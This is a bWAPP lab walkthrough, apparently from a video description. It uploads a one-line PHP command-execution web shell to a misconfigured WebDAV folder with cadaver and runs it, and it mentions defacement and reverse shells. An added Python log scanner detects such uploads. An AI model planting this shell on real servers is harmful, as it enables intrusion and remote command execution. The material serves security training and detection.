bWAPP Insecure WebDAV Configuration
Insecure WebDAV Configuration - Low Security Level

Solution:

Step 1. On the lesson page, click on WebDAV; a new window will pop up. http://10.0.2.4/webdav/ is the address of the WebDAV folder. We are going to use a tool called 'cadaver' to query WebDAV and upload a file to the remote server.

Step 2. Open a command prompt and type cadaver. Type help and it will display all the commands. Give the commands below:

    open http://10.0.2.4/webdav/
    ls
    put

Step 3. Open a new command prompt and create a simple PHP shell.

Command - nano pseudotime.php

Note: As angled brackets aren't allowed in a YouTube description, they are replaced with ( ) here; kindly make the necessary change.

    (?php echo system($_GET['cmd']); ?)

Save the file.

    put pseudotime.php pseudotime.php

// Follow the steps as shown in the video

Step 4. Go to the URL http://10.0.2.4/webdav/pseudotime.php?cmd=id.

Note: Not covered in this video, but you can explore this lesson further with -
i. Upload an image to deface the website
ii. Get a reverse shell generated.

PseudoTime
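Seen from the defender's side, the upload in Steps 2-3 and the request in Step 4 leave a recognizable pair of entries in the web server's access log. The following added example (not part of the original video description) scans Apache-format log lines for a successful PUT of a script file under /webdav/ followed by a request to that same file; the log lines, the client address 10.0.2.15 and the extension list are constructed assumptions.

```python
import re
from urllib.parse import urlsplit, unquote

# Apache common/combined log prefix: host ident user [time] "METHOD target PROTO" status
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "([A-Z]+) (\S+) [^"]*" (\d{3}) ')
SCRIPT_EXT = (".php", ".phtml", ".php5", ".phar")  # assumed script extensions

# Constructed sample log lines (not taken from a real server)
SAMPLE_LOG = [
    '10.0.2.15 - - [12/Mar/2024:10:01:02 +0000] "PROPFIND /webdav/ HTTP/1.1" 207 1203 "-" "-"',
    '10.0.2.15 - - [12/Mar/2024:10:01:40 +0000] "PUT /webdav/notes.txt HTTP/1.1" 201 - "-" "-"',
    '10.0.2.15 - - [12/Mar/2024:10:02:11 +0000] "PUT /webdav/pseudotime.php HTTP/1.1" 201 - "-" "-"',
    '10.0.2.15 - - [12/Mar/2024:10:02:30 +0000] "GET /webdav/pseudotime.php?cmd=id HTTP/1.1" 200 54 "-" "-"',
    '10.0.2.15 - - [12/Mar/2024:10:03:00 +0000] "GET /index.php HTTP/1.1" 200 4096 "-" "-"',
]

def find_webdav_script_drops(lines, dav_prefix="/webdav/"):
    """Return (uploads, executions) for script files written into the DAV folder."""
    uploads = {}       # path -> (client, time) of the successful PUT
    executions = []    # later requests to a path that was uploaded
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        client, when, method, target, status = m.groups()
        parts = urlsplit(target)
        path = unquote(parts.path)  # decode %xx so encoded extensions still match
        if not path.startswith(dav_prefix) or not path.lower().endswith(SCRIPT_EXT):
            continue
        if method == "PUT" and status.startswith("2"):
            # MOVE/COPY renames are not covered: their Destination header
            # is not written to the default access log.
            uploads[path] = (client, when)
        elif method in ("GET", "POST") and path in uploads:
            executions.append({"path": path, "client": client,
                               "time": when, "query": parts.query})
    return uploads, executions

if __name__ == "__main__":
    uploads, executions = find_webdav_script_drops(SAMPLE_LOG)
    for path, (client, when) in uploads.items():
        print(f"script uploaded via PUT: {path} from {client} at {when}")
    for hit in executions:
        print(f"uploaded script requested: {hit['path']}?{hit['query']} from {hit['client']}")
```

A hit from the first loop alone already shows that the folder accepts unauthenticated writes of executable file types, which is the misconfiguration this lesson demonstrates.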